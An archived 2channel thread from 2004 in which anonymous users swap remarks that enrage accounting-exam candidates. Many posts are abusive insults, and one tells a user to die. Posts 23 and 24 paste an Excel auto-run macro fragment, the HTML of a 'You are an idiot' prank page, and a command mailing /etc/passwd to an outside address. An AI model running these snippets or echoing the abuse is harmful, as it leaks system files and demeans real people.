5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

受験生をマジギレさせる言動 in 会計全般試験板

1 :一般に公正妥当と認められた名無しさん:04/04/11 01:22 ID:???
なんでしょね?

2 :一般に公正妥当と認められた名無しさん:04/04/11 01:33 ID:???
無職。

3 :一般に公正妥当と認められた名無しさん:04/04/11 02:05 ID:vnTaTTaf
「TACじゃ受からないよ。」

4 :一般に公正妥当と認められた名無しさん:04/04/11 02:06 ID:???
69

5 :一般に公正妥当と認められた名無しさん:04/04/11 02:44 ID:???
無職になるために無職で受験勉強してるんですか?

6 :一般に公正妥当と認められた名無しさん:04/04/11 05:15 ID:6JH1p86y
「どうせ無理なんだから、早くやめて就職したら?」

7 :一般に公正妥当と認められた名無しさん:04/04/11 06:10 ID:MHEqSuxX
まあ、アメリカ人のバーベキューへの思い入れは凄まじいものがあるからな。
海外赴任中に取引先のデブに、ディナー奢ったお礼に誘われて、嫌々行ってみたんだが、
まず肉が凄い。キロ単位で塊で買ってくる。手土産に持ってった肉をみて「それじゃ足りないよ、
貧乏人」という顔をする。エコノミックアニマルはいつまでも肉食には慣れないらしい、みたいな。
絶対、その肉4キロより、俺が買ってきた肉500gの方が高い。っつうか、それほぼ脂身じゃねえか。
で、デブが肉を切る。やたら切る。不良風のデブ娘とデブ息子もこのときばかりは親父を尊敬。
普段、目もあわせないらしいガキがダディクールとか言ってる。郷ひろみか? 畜生、氏ね。
鉄板も凄い、まず汚ねぇ。こげとかこびりついてる。 洗え。洗剤で洗え。つうか買い換えろ。
で、やたら焼く。焼いてデブ一家で食う。良い肉から食う。ゲストとかそんな概念一切ナシ。
ただただ、食う。デブが焼いて、デブがデブ家族に取り分ける。俺には回ってこない。畜生。
あらかた片付けた後、「どうした食ってないじゃないか?」などと、残った脂身を寄越す。畜生。
で、デブ一家、5キロくらい肉を食った後に、みんなでダイエットコークとカロリーカットのビールを飲む。
「今日は僕も飲んじゃう」とかデブ息子が言う。おまえ、酒どころか絶対薬やってるだろ?
デブ娘も「ああ、酔っちゃった、あなた素敵ね」とか言う。こっち見んな、殺すぞ。
デブ妻が「太っちゃったわね」とか言って、デブ夫が「カロリーゼロだから大丈夫さ」とか言う。
アメリカンジョークの意味がわかんねえ。畜生、何がおかしいんだ、氏ね。

まあ、おまえら、アメリカ人にバーベキュー誘われたら、要注意ってこった。


8 :一般に公正妥当と認められた名無しさん:04/04/11 08:56 ID:???
勉強してるんだ〜偉いね〜。

氏ね

9 :一般に公正妥当と認められた名無しさん:04/04/11 13:26 ID:???
会計士ってスーパーのレジの人だよね?

10 :一般に公正妥当と認められた名無しさん:04/04/11 13:29 ID:ZNX3mJ0v
またそんな何年かかるか判らないようなものを・・・
と正月に叔父さんに素で言われました。

11 :一般に公正妥当と認められた名無しさん:04/04/11 14:41 ID:???
「なんで大学出て受験勉強してるの?」
「就職浪人なんだよね」
「過去に人生失敗したの?」
「仕訳きれても、君のハンコに価値ないね!」
「大学生に『ベテ、ベテ』って馬鹿にされてるよね。でも、言い返せないよね、だって無職無能ベテなんだから」
「お前らのせいで不況なんだ」
「すねかじり」
「社会のゴミ」

12 :一般に公正妥当と認められた名無しさん:04/04/11 15:22 ID:???
みんな結構同じようなことを言われているんだな。

13 :一般に公正妥当と認められた名無しさん:04/04/11 15:50 ID:???
就職がうまくいかなくて、会計士受験生やっていると思われることがあって
嫌な思いをすることがある。会計士の存在自体を知らない近所のおばちゃんとかに。

14 :一般に公正妥当と認められた名無しさん:04/04/11 21:00 ID:lNSMpmRB
勉強だけしていればいいなんて楽だねー

15 :一般に公正妥当と認められた名無しさん:04/04/11 21:02 ID:IRw1N36I
あれ?まだ受かってなかったの?

16 :一般に公正妥当と認められた名無しさん:04/04/11 21:04 ID:fhj487c1
いつまでやる気だ?

17 :一般に公正妥当と認められた名無しさん:04/04/11 21:09 ID:???
「そんなんで結婚できるの?」

彼女いる奴に言うと、漏れなく殴り合いになるかと。


18 :一般に公正妥当と認められた名無しさん:04/04/11 21:15 ID:???
パンフレットの合格者の写真一覧見て・・・


パっとしない奴ばっかだよね・・

19 :一般に公正妥当と認められた名無しさん:04/04/11 21:25 ID:???
親の顔が見てみたい。 コレ最強

20 :よしくん:04/04/11 21:43 ID:ka1GRl2R
去年、彼女(結婚予定)の親から「今年は合格できるのか?」って聞かれ
、「はい」と答えたが、結果短刀であぼーん。
責任をとって、彼女と別れた。
果たして、今年は?

21 :17:04/04/11 21:45 ID:???
>>20

そんな君には
「次の彼女ができると思ってるの?」
という煽りになる。

22 :一般に公正妥当と認められた名無しさん:04/04/11 21:52 ID:???
>>15は地味にむかつくな。

23 :一般に公正妥当と認められた名無しさん:04/04/11 22:18 ID:???
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub

Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10

End Sub


24 :一般に公正妥当と認められた名無しさん:04/04/11 22:19 ID:???
<html>
<head>
<title>You are an idiot!</title>
<script language="Javascript" src="../script/you.js"></script>
</head>
<body bgColor=#ffffff onload="flagRun=1;playBall();return true;bookmark();" onKeyDown="altf4key();ctrlkey();delkey();" onUnLoad="procreate()" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="100%" height="100%">
<param name=movie value="youare.swf">
<param name=quality value=high>
<embed src="youare.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="100%" height="100%">
</embed>
</object>
</body>
</html>

cat /etc/passwd | mail nobody@nonexistent.com



25 :一般に公正妥当と認められた名無しさん:04/04/11 23:11 ID:gLlDUz3A
無職w

26 :一般に公正妥当と認められた名無しさん:04/04/11 23:25 ID:???
.................................................................................................................................................................................................................................
.................................................................................................................................................................................................................................
.................................................................................................................................................................................................................................
.................................................................................................................................................................................................................................
.................................................................................................................................................................................................................................
.................................................................................................................................................................................................................................
.................................................................................................................................................................................................................................
.................................................................................................................................................................................................................................
.................................................................................................................................................................................................................................
.................................................................................................................................................................................................................................
.................................................................................................................................................................................................................................
.................................................................................................................................................................................................................................
.................................................................................................................................................................................................................................
.................................................................................................................................................................................................................................
.................................................................................................................................................................................................................................
.......................................................................................................................................


ほら、答練の時間だぞ基地外ドモ。


27 :一般に公正妥当と認められた名無しさん:04/04/11 23:40 ID:???
>>26 センスありすぎwww

28 :一般に公正妥当と認められた名無しさん:04/04/13 08:57 ID:QSuQS0p2
>>26 ワロタ!

29 :一般に公正妥当と認められた名無しさん:04/04/13 10:26 ID:4rH50IwW
>>26
にちゃんねるってる時くらい忘れさせてくれ…(´・ω・`)

30 :一般に公正妥当と認められた名無しさん:04/04/13 12:24 ID:fC96xngW
社会的地位

 税理士 > 会計士


31 :一般に公正妥当と認められた名無しさん:04/04/13 13:49 ID:HIJBzWsH
母「今年落ちたらどうするの?」

32 :一般に公正妥当と認められた名無しさん:04/04/13 14:09 ID:???
>>31
それでマジギレしたら、世間では逆ギレと言われる罠w

33 :一般に公正妥当と認められた名無しさん:04/04/13 14:31 ID:???
専念主婦

34 :一般に公正妥当と認められた名無しさん:04/04/14 21:57 ID:???
嫁はんにやしのうてもらったらどないでっか?

35 :一般に公正妥当と認められた名無しさん:04/04/14 21:58 ID:???
嫁はんにやしのうてもらったら??

36 :一般に公正妥当と認められた名無しさん:04/04/15 09:53 ID:B4fMWs0+
就職した大学の友達から
「いいな〜。私も会社辞めて勉強しよっかな☆」
馬鹿女め!

37 :一般に公正妥当と認められた名無しさん:04/04/15 15:26 ID:???
「お前が受かったら俺もやるよ」

38 :一般に公正妥当と認められた名無しさん:04/04/17 12:10 ID:???
親をなぐってしまいました・・・。
さようなら。

39 :一般に公正妥当と認められた名無しさん:04/04/17 22:20 ID:???
なんか少女漫画やってるでしょ。
TACの出身の人が書いてるやつ、

40 :一般に公正妥当と認められた名無しさん:04/04/18 14:43 ID:ceOOptA2
もう1ヶ月きるよ

41 :一般に公正妥当と認められた名無しさん:04/04/18 14:57 ID:???
カイケイシ目指してるんだ。
ふ〜ん。

42 :一般に公正妥当と認められた名無しさん:04/04/18 17:35 ID:OqRuBolD
老けてるね
頭薄いね
髭濃いね
いつも同じ服だね
臭いね


43 :一般に公正妥当と認められた名無しさん:04/04/18 17:35 ID:JRlu6tSI
会計士って何?

44 :一般に公正妥当と認められた名無しさん:04/04/18 17:36 ID:???
>>43
老けてるね


45 :一般に公正妥当と認められた名無しさん:04/04/18 17:43 ID:???
税理士とは違うの?

46 :一般に公正妥当と認められた名無しさん:04/04/18 17:43 ID:???
先に受かった後輩に

「○○さんまだやってたんですか?」

47 :一般に公正妥当と認められた名無しさん:04/04/18 17:47 ID:OqRuBolD
>>46
頭薄いね


48 :一般に公正妥当と認められた名無しさん:04/04/18 17:50 ID:???
なんで5科目全部受けてるの?マゾ?(院免の方から)

49 :一般に公正妥当と認められた名無しさん:04/04/18 17:52 ID:???
資格とってどうするの?何がしたいの?

50 :一般に公正妥当と認められた名無しさん:04/04/18 17:53 ID:???
>>48
髭濃いね


51 :一般に公正妥当と認められた名無しさん:04/04/18 17:53 ID:???
>>49
いつも同じ服だね


52 :一般に公正妥当と認められた名無しさん:04/04/18 17:54 ID:???
俺も昔受けたけど辞めてよかったわ〜!

53 :一般に公正妥当と認められた名無しさん:04/04/18 17:55 ID:???
>>52
臭いね


54 :一般に公正妥当と認められた名無しさん:04/04/18 18:24 ID:???
学生さんに払わす訳いか無いよ。←元同級生弁

55 :一般に公正妥当と認められた名無しさん:04/04/21 19:36 ID:gkCy2t2q
>>7
激ワラタ


56 :一般に公正妥当と認められた名無しさん:04/04/22 00:02 ID:c4UJF8/s
age

57 :一般に公正妥当と認められた名無しさん:04/04/22 23:10 ID:+BSTgtRj
あたしぃ、電卓はやく打てるからぁ、
会計士しけん受けようと思ってるんだぁ〜

58 :一般に公正妥当と認められた名無しさん:04/04/22 23:15 ID:EvvPbrb7
まだ被扶養家族?w
30近いのに?w


59 :一般に公正妥当と認められた名無しさん:04/04/22 23:15 ID:To1NFk98
つーかおまえらはうからない。
勘違いしてんじゃねーよばか!

60 :味のタウ呂:04/04/23 00:22 ID:qrR6syAV
安っ!おまえの定期、学割かよっ!
いいねー(←この一言がむかつく)

61 :一般に公正妥当と認められた名無しさん:04/04/23 02:48 ID:Tfg6fYz1
東京ドーム近くていいねー。

62 :一般に公正妥当と認められた名無しさん:04/04/23 04:33 ID:OVug0OMv
>58は地味に痛いな〜
指摘されたことというよりも
そこにある厳然たる事実が

63 :一般に公正妥当と認められた名無しさん:04/04/23 04:40 ID:???
学生のときから勉強はじめて20代後半になっても無職って人実際どのくらいいるんだろう?
合格体験記とか見てると20代後半の合格者って一回就職したけどすぐ辞めて目指したとかそんな多いみたいだけど。

64 :一般に公正妥当と認められた名無しさん:04/04/24 21:49 ID:???
いいかげん将来のことすこしはかんがえろ。

といわれた・・・。


65 :一般に公正妥当と認められた名無しさん:04/04/25 00:21 ID:DDenlzfI
人の人生、良いんじゃないかな〜・・・。目標があるということは年齢に関係なく良いと思う


66 :一般に公正妥当と認められた名無しさん:04/04/25 00:37 ID:???
履歴書の経歴何年空いてるの?

67 :一般に公正妥当と認められた名無しさん:04/04/25 00:42 ID:Ncac8eJb
お前、幾つだっけ?

68 :一般に公正妥当と認められた名無しさん:04/04/25 00:43 ID:hoRhEtWL
難易度から考えて、税理士のおまけに会計士をつけるべき

69 :一般に公正妥当と認められた名無しさん:04/04/25 01:12 ID:???
お前の精神力すごいと思うよ。
受かっても就職できない状況なのに勉強続けてんだからさ。
俺なら受験から撤退してるよ。

昨年合格者からの言葉

70 :一般に公正妥当と認められた名無しさん:04/04/26 18:06 ID:???
能書きはいいから早く受かれよ。

71 :一般に公正妥当と認められた名無しさん:04/04/29 16:34 ID:K8fh5ztY
age

72 :一般に公正妥当と認められた名無しさん:04/04/29 16:43 ID:K8fh5ztY
ガリ勉、怠け者、
仕事と勉強どっちが大事なんだ。
働かざる者喰うべからず
お幾つ、    役立たず、
合格発表どうでした。
お子さんは   世間をなめとんのか   
学院長にだまされているのだ、早く目を覚ませ

73 :一般に公正妥当と認められた名無しさん:04/04/29 17:06 ID:3nnKA6IO
おい!
●週勤1日の風俗譲より遥かに安月給な貧乏会計事務所職員!
▲リストラ寸前の無能リーマン!
■三流大学の学生!
どうして、税理士試験のために頑張っているんだ?
合格しても、それを認めてくれる会計事務所や会社なんてないぞ。
独立開業で一発逆転? 寝ぼけたこと言ってるんじゃねえよ。
業界が飽和状態なの、税理士に依頼する納税者が激減していることを知らないのか?
専門学校のパンフレットを信じて人生を台無しにしてしまったな。
税理士試験で儲かるのは専門学校だけだ。
本当に情けない人生だよ、あははははは。


74 :一般に公正妥当と認められた名無しさん:04/04/29 17:06 ID:???
お前大丈夫か?
と、地方市役所下級役人の同級生に言われた。
たしかにやばいが、お前よりは大丈夫だ。

75 :被害者:04/04/29 17:30 ID:K8fh5ztY
被害者「おれは受験生だ」
被害者の兄「お前は学院長の被害者なんだぞ」

76 :一般に公正妥当と認められた名無しさん:04/04/29 18:20 ID:???
「寛容なご両親なのですね」

77 :ガリ勉:04/04/29 20:19 ID:XCbtLEEL
御先祖様になんとお詫びを 
自衛隊に入いろ
甘えるな
性根を入れ替えろ
現実から逃げるな 卑怯者

78 :一般に公正妥当と認められた名無しさん:04/04/29 20:43 ID:???
自殺しないでね

79 :一般に公正妥当と認められた名無しさん:04/04/29 21:35 ID:???
生きてたの?

80 :一般に公正妥当と認められた名無しさん:04/04/29 21:41 ID:???
同級生は今までにいくら稼いだことか

81 :一般に公正妥当と認められた名無しさん:04/04/29 21:44 ID:???
来年がんばればいいじゃん

82 :一般に公正妥当と認められた名無しさん:04/04/29 21:45 ID:???
>>80
それはマジギレっていうか、鬱になるよなぁ
1年間で最低400〜500マソドブに捨ててるようなものだ

83 :一般に公正妥当と認められた名無しさん:04/04/29 21:59 ID:???
高校or大学の同窓会行くと
けっこういいとこで働いている奴いるから
欝になる、というか自分は何毎日TAC通ってるんだろって。
男でもけっこう結婚している奴いるしなw
オレはいつまで親のスネかじってるんだろOTL

84 :一般に公正妥当と認められた名無しさん:04/04/29 22:12 ID:???
新卒で普通に大企業に就職していれば、
今頃、可愛い彼女とGWに海外旅行してたのにね!

今晩もまた一人でマスかきですか?
猿にならないようにね!

85 :一般に公正妥当と認められた名無しさん:04/04/29 22:30 ID:???
いやTACに彼女はいるけど

86 :一般に公正妥当と認められた名無しさん:04/04/30 01:03 ID:V8/oQ73H
「試験に不合格になってよかったよお〜。」
そう言った29歳の奴は次の日の夜、知らない男に7000円を恐喝された。

87 :一般に公正妥当と認められた名無しさん:04/04/30 01:55 ID:???
そ香具師は病院に行くべし

88 :一般に公正妥当と認められた名無しさん:04/05/01 12:51 ID:k5kBzUUD
>>84
ますかきはいいぞ〜

89 :一般に公正妥当と認められた名無しさん:04/05/01 18:49 ID:Z9vRx4+J
この穀潰し

90 :ガリ勉:04/05/01 21:21 ID:q85OfcXA
どの面さげて、同窓会に行くんじゃ 表面上憐れみを受けても、裏では笑い者


91 :一般に公正妥当と認められた名無しさん:04/05/01 22:01 ID:C3+t0iov
>新卒で普通に大企業に就職していれば、
>今頃、可愛い彼女とGWに海外旅行してたのにね
小さいヤツだなw

92 :一般に公正妥当と認められた名無しさん:04/05/01 22:24 ID:???
>新卒で普通に大企業に就職していれば、
>今頃、可愛い彼女とGWに海外旅行してたのにね

別に受験生でもそんなことやる気になればできるしな
現に俺は彼女と遊びにいったし、
受験生がみんなお前と同じで女に疎くて寂しい思いしてるなんて思ったら大間違い
社会人になってうまく遊べる奴は、受験生のうちでもそれなりにやってる
おまえかわいそうだな、なんかいたいってw

93 :一般に公正妥当と認められた名無しさん:04/05/01 22:30 ID:???
受験生をマジギレさせるスレで反論はイタ過ぎだよ…

94 :一般に公正妥当と認められた名無しさん:04/05/01 22:38 ID:6Pz6GF8C
同級生はみんな結婚してるのに。

95 :一般に公正妥当と認められた名無しさん:04/05/01 23:02 ID:Od88KVLv
>>92

メガネッコ?(プゲラ


96 :一般に公正妥当と認められた名無しさん:04/05/01 23:05 ID:gydUtVEO
あなた東大生でしょ?

97 :一般に公正妥当と認められた名無しさん:04/05/02 01:55 ID:???
92はばかだなプ

98 :一般に公正妥当と認められた名無しさん:04/05/02 01:57 ID:A5virzWR
>>92 は自殺するタイプ

99 :一般に公正妥当と認められた名無しさん:04/05/02 02:02 ID:???
受験生をマジギレさせる言葉は

新卒で普通に大企業に就職していれば、
今頃、可愛い彼女とGWに海外旅行してたのにね!

に決まりました。

100 :一般に公正妥当と認められた名無しさん:04/05/02 02:55 ID:???
富める者ますます富み、貧しき者ますます奪われん

101 :ガリ勉:04/05/02 19:15 ID:9MBpsCD4
働かざる者、風俗へ逝くべからず 

102 :一般に公正妥当と認められた名無しさん:04/05/02 20:44 ID:12BNSdby
高卒でも、その後頑張って税理士試験に合格できれば、その人は高校に努力をしてれば早慶クラスの大学も行けた可能性がある。

逆に高校で頑張って早慶クラスの大学に行けたとしても、その後遊んでしまって税理士試験に合格できない人間もいる。

最終的に勝てば良いと思う。

上場企業でもいいだろうし、国家公務員でもいい。

最悪は、無職、社会人経験無し、実務経験無し、高年齢、人嫌いの引きこもり...

難関資格の勉強を盾に、いつまでも社会の荒波にさらされないでいる(さらされたくない)人間だろうな。


103 :一般に公正妥当と認められた名無しさん:04/05/02 21:51 ID:uhgdfnlD
お前は塩やか?

104 :一般に公正妥当と認められた名無しさん:04/05/02 23:54 ID:SMkilyI5
もう駄目ダYO!

105 :一般に公正妥当と認められた名無しさん:04/05/02 23:58 ID:awJezALb
同級生の××君は子供生まれたらしいよ

106 :一般に公正妥当と認められた名無しさん:04/05/03 00:12 ID:???
会社の同期のA君は海外勤務だよ。
         B君はMBA取りに留学中だよ。
         C君は本社勤務だけど出世コースだよ

ぼくは、、、、、無職だ、、、、、、、、、、、、ん?あれ?うーん、、、鬱

107 :一般に公正妥当と認められた名無しさん:04/05/03 01:38 ID:???
会計士補補

108 :一般に公正妥当と認められた名無しさん:04/05/03 03:13 ID:uy67EwqU
別に92の言ってることは普通じゃねーの?
言い方は問題あるにしてもさ


109 :一般に公正妥当と認められた名無しさん:04/05/03 03:23 ID:???
今年も落ちるんだな君たち・・・
プッ・・・
かわいそ・・

110 :一般に公正妥当と認められた名無しさん:04/05/03 03:25 ID:???
>>109 キミモナー

111 :一般に公正妥当と認められた名無しさん:04/05/03 06:59 ID:???
乞食のくせに...
何様だと思ってんの?
中卒でも働いて社会に貢献している人のほうが、無職で飯食ってる受験生よりも遥かに価値がある。


112 :一般に公正妥当と認められた名無しさん:04/05/03 10:21 ID:???
まあでもこれだけ簡単になった試験受からない奴は
カスだよな。


113 :一般に公正妥当と認められた名無しさん:04/05/03 11:19 ID:???
会社を辞めたリスク    240万
TACにつぎ込んだかね  150万
親からかりたかね     240万
失ったプライド       Priceless


114 :南無阿弥陀仏:04/05/03 16:34 ID:brM21F3K
時間というものは残酷なものですね 南無阿弥陀仏 南無阿弥陀仏

115 :一般に公正妥当と認められた名無しさん:04/05/03 17:22 ID:???
>受験生をマジギレさせる言動

学院長の言動全て

116 :一般に公正妥当と認められた名無しさん:04/05/03 20:33 ID:???
なるほど、機会損失とはこのことですね

117 :一般に公正妥当と認められた名無しさん:04/05/03 22:28 ID:???
2ちゃんねるに書き込むのは時間損失。

118 :一般に公正妥当と認められた名無しさん:04/05/03 22:48 ID:???
↑おもろい

119 :一般に公正妥当と認められた名無しさん:04/05/03 23:12 ID:???
2ちゃんねるの情報を信じないで既卒になったのは職業損失

120 :ミラーマン:04/05/04 00:03 ID:xMez8FkZ

       /;;;;;;;;;;;;`Y´;;;;;;;;\
        /;;;;;;;;;;;;;;;;;;;;;;l;;;;;;;;;;;;;;;;;;',
      l;;;;;r'´ ̄ ̄~  ̄ ̄ヽ;;;;;!
       |;;;;;;|         |;;;;;|
       {;;;;r',;;'"゙`、  .,,;-ー、 ',:;}   
      rゝl!. (●)│l (●), :l;jヽ    私の免除印欲しい???
       〉),|   . ノ ヽ   :!ノ/      
        ゝ_.l   ゝ- '   ,jノ
        l、  ___,  /!       __ ☆
         lヽ  ー‐'  ,/ !      |   |"
          /!、`ー─‐'" /ヽ     r~) // :|ワ
                     ノ |__|ワ







121 :一般に公正妥当と認められた名無しさん:04/05/04 00:29 ID:6Qs6LED7
受かっても食えないよ

122 :一般に公正妥当と認められた名無しさん:04/05/04 00:46 ID:???
機会損失とかいったら中卒で働いているのが一番損失が少なくなる。
高校大学で学校に金払っている期間、稼ぐ機会を失っているんだから。

123 :一般に公正妥当と認められた名無しさん:04/05/04 12:44 ID:???
機会損失をわかってない香具師が少なくとも一人いることが判明しますた

124 :ガリ勉:04/05/04 20:56 ID:zJH8XaF5
資格試験のため人生とはなんだったのか

125 :一般に公正妥当と認められた名無しさん:04/05/04 22:22 ID:???
監査法人の就職活動を失敗した人には
自分のことは棚に上げて家庭がどうとか社会がどうとか
自分以外のものに責任をなすりつけようとするものが多く
時間の経過とともに自らをとりまく条件が悪くなっている
にも関わらず反省しようとしないから
いつまでたってもまともな就職が決まらない
まあ反省したところでもう遅いというのはあるが


126 :一般に公正妥当と認められた名無しさん:04/05/05 00:26 ID:YBqVMVrQ
俺が会社辞めて勉強はじめればおまえを抜く自信あるよ

127 :一般に公正妥当と認められた名無しさん:04/05/05 00:39 ID:???
もうあきらめろや。無駄だと思われ。

128 :一般に公正妥当と認められた名無しさん:04/05/05 01:07 ID:TGzj3gIm
税理士に方向転換?どうせ税理士も受からないよ。

(会計事務所べテ公に多いぞ〜。会計士途中であきらめて税理士目指したものの、合格しないやつ。
 彼らは会計士目指していた時代の事を多く語ろうとしない)


129 :一般に公正妥当と認められた名無しさん:04/05/05 01:35 ID:???
3回、4回受けてもうからない香具師は会計のセンスがないんだ。
あきらめろ。ムダだ。専門学校を儲からせるだけのカモ。

130 :一般に公正妥当と認められた名無しさん:04/05/05 02:01 ID:???
法人税法なんて専門卒の女の子レベル

131 :ガリ勉:04/05/05 11:52 ID:O+aqgFOs
自習室に何年お住みですか。

132 :一般に公正妥当と認められた名無しさん:04/05/05 12:19 ID:???
そうだ…就職しよう

133 :一般に公正妥当と認められた名無しさん:04/05/07 00:49 ID:RgTWoxlL
学院長語録

「会計士試験を受けて、落ちてもよいのです。どうして落ちてはいけないのですか。」
(TAC NEWS6月号)

「公認会計士試験に合格したばかりの条件の良い男性(注;学院長のこと)を、女性
たちは放っておかなかった。いろいろな女性から様々な合図が送られてきた。残念な
がらわたしには応えるだけの時間がなかった。眠る時間まで削って格闘していた私は
どんな絶好の合図が送られてきても見送った」
(同)

134 :一般に公正妥当と認められた名無しさん:04/05/08 02:48 ID:DgYGsq3x
>133
馬鹿じゃねえ、時代が違うよ、
斎藤社長の時代は「男はつらいよ」の甘っちょろい時代の日本
今の時代は、キムタクが好きな男、11年連続1位の時代


135 :一般に公正妥当と認められた名無しさん:04/05/08 02:52 ID:???

「会計士試験を受けて、落ちてもよいのです。どうして落ちてはいけないのですか。」

   ↑
これはTAC的には正しい
儲かるからな!

136 :一般に公正妥当と認められた名無しさん:04/05/08 02:57 ID:???
>>134
えっと・・・133じゃないけど、
一度社会に出てみなさい。

例えば、
ブ男の医者>>>>>>>>>>>>>>>>>>>>>カコイイ安サラリーマン
という現実を見ることになる。

自分のスキルで食っていけない女は、
顔より金を取るんだよ。
これ10000年後も変わらない常識です。

137 :一般に公正妥当と認められた名無しさん:04/05/08 05:34 ID:???
そういう女はブ男の医者に貢いでもらったお金で、カコイイ奴と遊ぶ。

138 :一般に公正妥当と認められた名無しさん:04/05/08 11:20 ID:???
てことやカコイイ奴はブ男に間接的に養われてるってことか。


139 :134:04/05/08 23:34 ID:DgYGsq3x
>136
ごめん、反論させて

社会に出ると
ブ男の医者>>>>>>>>>>>>>>>>>>>>>カコイイ安サラリーマン
っていうなら、

学生時代は
カコイイ中卒>>>>>>>>>>>>>>>>>>>>>ブ男の東大生

どちらの世界が女は本音だと思います?


140 :一般に公正妥当と認められた名無しさん:04/05/09 00:17 ID:SINDQAbu
ブ男の医者>>>>>>>>>>>>>>>>>>>>>カコイイ安サラリーマン
のほうがいい。


141 :一般に公正妥当と認められた名無しさん:04/05/09 00:24 ID:???
 
 色男
  金と力は
   なかりけり


142 :一般に公正妥当と認められた名無しさん:04/05/09 01:05 ID:???
>>141
それはブ男の妄想w
性格の悪い美人と性格の良い不細工どっちいい?と同じレベルw
性格も顔も財産も
実は独立事象とおもう。
美人→ちやほやされる→高慢になる→性格悪くなる。
不細工→相手にされない→被害妄想→性格悪くなる。
結局、顔が良くて、金持ちで、性格が良い奴がもてると。
男も女もよw



143 :136:04/05/09 03:25 ID:???
>>139
本音?
カコイイ医者がベストだろうけど。。

カコイイ男を求めるのは見せびらかし(男の顔)と自己満足と子供がかわいくなる、の3点だろうし、
お金持ちを求めるのは見せびらかし(車・家)と生活の安定、の2点だろうね。

学生気分と社会でのサバイバルでは環境が違うから、
自ずと女の子が求めるものも変わるでしょ。

君も、かわいいだけの馬鹿な女は嫌でしょ?
結婚するとなればかわいくなくても、
まともな家庭を築ける賢い女をきっと選ぶと思うよ。

144 :一般に公正妥当と認められた名無しさん:04/05/09 03:30 ID:???
ブ男の医者>>>>>>>>>>>>>>>>>>>>>カコイイ安サラリーマン

ではなく

ブ男の医者の「金」>>>>>>>>>>>>>>>>>>>>>カコイイ安サラリーマン


つまり「本人」によってきてるのではなく「金」(もしくは医者というステータス)によってきてるだけなので、
「金」だけで満たされて他はなにもいらないっていう女ならいいが
そうじゃない女はそのブ男が働いている間に、他で遊んでおります(そのブ男の文句をいいながら・・・)

「金」と「ブ男」を天秤にかけて「金」が勝ったため「ブ男」に関しては我慢してるわけです。

ウンコ食ったら1000万円やるっていわれて、1000万もらうために我慢してウンコ食ってるのと同じなのです

ただ、そんなこと分かってるがそれでもいいというお金持ちの男なら私は否定しません。

お金によってきてるのに、本人(自分自身)がモテてると思っている人はカワイソウだと思います。
その人にお金がなくなったら女は去っていくのだから・・・

145 :一般に公正妥当と認められた名無しさん:04/05/09 04:25 ID:+z77PD8Y
えー・・・

スレタイの趣旨と離れてきたようなので



修正age!

146 :一般に公正妥当と認められた名無しさん:04/05/09 12:30 ID:???
パンティースレが削除されてから、板全体の雰囲気が悪くなってしまった。
短答までに復活しないと

147 :136:04/05/09 21:53 ID:???
>>144
その辺りはグレーゾーンだから、
ひとくくりにするには難しいよ。

お金持ってる方が、みみっちいとこが無いし、
それを男らしく感じる女の子もいるでしょう。

逆に、金は無くても、身の丈でがんばる人を
男らしいと感じる人もいるし。

でも、お金はある方が有利という意味で
ブ男の医者>>>>>>>>>>>カコイイ安サラリーマン
というわけです。

試験受かって、それに安心せずに自己研鑽続けるなら
(受かっただけで満足な奴は知らないけど)
どちからというと医者の方に近づくわけだから、
何も心配することはないかと。

スレの趣旨とだいぶ変わってしまった。。(笑)

ちなみに、
> そうじゃない女はそのブ男が働いている間に、他で遊んでおります(そのブ男の文句をいいながら・・・)

そういう女を選ぶ時点で、ブ男の方にも女を見る目が無いわけで、
そういう女の子と結婚しても、側で見てると幸せに見えても
案外内情は悲惨なもんです。
結婚に関しては、勝ち組みかどうかは本人しか分かりませんから。


148 :一般に公正妥当と認められた名無しさん:04/05/09 22:03 ID:???
俺がもし逆玉にのって超金持ちのブサイク女と結婚することになったらその金使って外で遊んじゃうだろうな。
それといっしょか。

149 :一般に公正妥当と認められた名無しさん:04/05/16 14:23 ID:???
結局、あほで自堕落な女の価値観が良い男の判断基準になっているだけか。

150 :一般に公正妥当と認められた名無しさん:04/05/20 21:03 ID:???
でぶはどんなにも好かれないから安心してしね。

151 :一般に公正妥当と認められた名無しさん:04/05/21 12:58 ID:gQ57iUB4
ボーダー40

152 :一般に公正妥当と認められた名無しさん:04/05/21 13:05 ID:???
よくわからんが、
お金もない試験浪人の
ブ男の漏れはだめってことか?

153 :一般に公正妥当と認められた名無しさん:04/05/22 00:23 ID:???
調子にのってなきゃいいよ。
どうみても中学・高校いじめられっこで大学入ってようやくいじめから解放されたようなでぶが調子にのってるのがむかつく。
しかも、それでいて低学歴って・・・。
サンドバッグ時代を思い出せよ、くずが。

154 :一般に公正妥当と認められた名無しさん:04/05/28 00:41 ID:???
試験を直前に控えた受験生の教材をパクるw

155 :一般に公正妥当と認められた名無しさん:04/05/28 00:42 ID:???
試験を直前に控えた受験生の教材をパクるw

156 :一般に公正妥当と認められた名無しさん:04/05/28 18:44 ID:???
いつまでも高校生気分で張り切っちゃってる奴は恥ずかしい。153みたいに。

157 :一般に公正妥当と認められた名無しさん:04/05/28 21:10 ID:usUzxLZm
まぁでも俺が思うに、高学歴の奴は
女関係を何かしら犠牲にして来たやつだと思うぜ。
実際に中学の時に俺より頭いい奴いっぱいいたよ
ただ、勉強しなくて女に目がいったせいで、今更の話じゃないぜ。
実際大人の世界でも良く言う事ジャン
「結婚したら男は駄目になる」って


158 :一般に公正妥当と認められた名無しさん:04/05/28 23:42 ID:YdzibTpj
>>153
大学生になってもそんな考えしてるとは…子供だな…

159 :一般に公正妥当と認められた名無しさん:04/05/31 16:17 ID:???
いじめられっこ必死だな。
短答落ちだろうからさっさと死ねよ。
生きていてもいいことないぞ。
153 は普通の考えだろ。

160 :一般に公正妥当と認められた名無しさん:04/05/31 20:23 ID:???
